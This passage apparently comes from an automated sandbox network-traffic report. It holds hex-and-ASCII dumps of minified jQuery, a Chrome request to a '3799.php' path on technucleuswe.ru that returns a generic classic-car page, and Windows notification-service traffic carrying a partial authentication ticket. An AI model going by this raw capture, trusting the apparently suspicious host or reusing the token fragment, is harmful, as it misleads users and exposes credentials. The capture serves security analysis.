                            2024-08-13 19:58:07 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                            2024-08-13 19:58:07 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                            2024-08-13 19:58:07 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                            2024-08-13 19:58:07 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                            2024-08-13 19:58:07 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                            2024-08-13 19:58:07 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                            2024-08-13 19:58:07 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                            2024-08-13 19:58:07 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                            2024-08-13 19:58:07 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            37192.168.2.659196188.114.96.34432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:10 UTC350OUTGET ///3799.php HTTP/1.1
                            Host: technucleuswe.ru
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:11 UTC774INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:58:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-powered-by: PHP/7.3.33
                            access-control-allow-origin: *
                            cache-control: no-store, no-cache, must-revalidate, max-age=0
                            pragma: no-cache
                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                            vary: Accept-Encoding
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K1nKpxikTWtu5qfpxm%2BFJaGkfjFpLeqIxQq6GiRPaLeKHlWVHzv2us2NmIRuITWxdVhhMTIESOgJfmy6nJ3J430%2BFwOh4K1AZECOZ4YFFg%2Ba9iDuCoaxDIsRvEzkU4n9uhMD"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8b2b47460e4a17c1-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:58:11 UTC595INData Raw: 31 61 64 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6c 61 73 73 69 63 20 43 61 72 20 41 64 6d 69 72 65 72 73 20 2d 20 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e
                            Data Ascii: 1ada<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Classic Car Admirers - technucleuswe.ru</title> <link href="https://cdn.jsdelivr.net/n
                            2024-08-13 19:58:11 UTC1369INData Raw: 74 68 2e 62 69 6e 67 2e 63 6f 6d 2f 74 68 2f 69 64 2f 4f 49 50 2e 4e 63 75 32 47 53 77 79 56 45 2d 6d 71 51 54 6f 6f 2d 73 35 2d 51 48 61 46 48 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                            Data Ascii: th.bing.com/th/id/OIP.Ncu2GSwyVE-mqQToo-s5-QHaFH') no-repeat center center; background-size: cover; color: white; padding: 150px 0; text-align: center; } .content-section {
                            2024-08-13 19:58:11 UTC1369INData Raw: 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 2f 23 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                            Data Ascii: chnucleuswe.ru/#">Home</a> </li> <li class="nav-item"> <a class="nav-link" href="https://technucleuswe.ru/#about">About</a> </li> <li class="nav-item">
                            2024-08-13 19:58:11 UTC1369INData Raw: 64 65 63 65 61 65 31 65 37 66 63 65 61 65 35 65 63 66 63 66 61 66 65 65 63 61 37 66 62 66 63 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 5f 63 66 5f 65 6d 61 69 6c 5f 5f 22 20 64 61 74 61 2d 63 66 65 6d 61 69 6c 3d 22 64 36 62 35 62 39 62 38 61 32 62 37 62 35 61 32 39 36 61 32 62 33 62 35 62 65 62 38 61 33 62 35 62 61 62 33 61 33 61 35 61 31 62 33 66 38 61 34 61 33 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 35 35 35 2d 38 36 37 2d 30 33 33 32 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                            Data Ascii: deceae1e7fceae5ecfcfafeeca7fbfc"><span class="__cf_email__" data-cfemail="d6b5b9b8a2b7b5a296a2b3b5beb8a3b5bab3a3a5a1b3f8a4a3">[email&#160;protected]</span></a> or call us at 555-867-0332.</p> <blockquote class="blockquote">
                            2024-08-13 19:58:11 UTC1369INData Raw: 20 53 75 70 65 72 63 61 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 62 6f 64 79 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 22 3e 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 61 6e 64 20 64 65 73 69 67 6e 2e 3c 2f
                            Data Ascii: Supercar"> <div class="card-body"> <h5 class="card-title">Modern Supercars</h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance, and design.</
                            2024-08-13 19:58:11 UTC811INData Raw: 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 2f 23 70 72 69 76 61 63 79 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20
                            Data Ascii: s="list-inline-item"> <a href="https://technucleuswe.ru/#privacy">Privacy</a> </li> <li class="list-inline-item"> <a href="https://technucleuswe.ru/#terms">Terms</a> </li>
                            2024-08-13 19:58:11 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination Port
                            38192.168.2.65919740.115.3.253443
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:15 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 46 6b 55 30 39 4a 37 74 4f 30 6d 7a 68 38 62 42 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 61 38 66 63 62 37 65 66 33 65 30 31 38 34 31 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: FkU09J7tO0mzh8bB.1Context: 9a8fcb7ef3e01841
                            2024-08-13 19:58:15 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-08-13 19:58:15 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 46 6b 55 30 39 4a 37 74 4f 30 6d 7a 68 38 62 42 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 61 38 66 63 62 37 65 66 33 65 30 31 38 34 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 31 67 2b 44 4d 34 44 4f 4f 42 33 59 71 2f 7a 62 35 46 4c 52 65 64 4e 64 44 6d 68 57 75 61 74 63 43 32 73 30 34 57 75 4e 6f 47 4f 75 73 51 4f 47 65 55 38 53 58 6f 47 31 45 52 74 41 77 4f 76 79 2b 50 66 74 4d 36 65 76 49 52 6e 4f 6b 63 48 47 56 38 38 7a 51 55 36 59 4a 58 6c 50 67 33 6c 46 70 47 6e 44 6d 67 61 77 75 4a 4b 63
                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: FkU09J7tO0mzh8bB.2Context: 9a8fcb7ef3e01841<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY1g+DM4DOOB3Yq/zb5FLRedNdDmhWuatcC2s04WuNoGOusQOGeU8SXoG1ERtAwOvy+PftM6evIRnOkcHGV88zQU6YJXlPg3lFpGnDmgawuJKc
                            2024-08-13 19:58:15 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 46 6b 55 30 39 4a 37 74 4f 30 6d 7a 68 38 62 42 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 61 38 66 63 62 37 65 66 33 65 30 31 38 34 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: FkU09J7tO0mzh8bB.3Context: 9a8fcb7ef3e01841<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                            2024-08-13 19:58:15 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
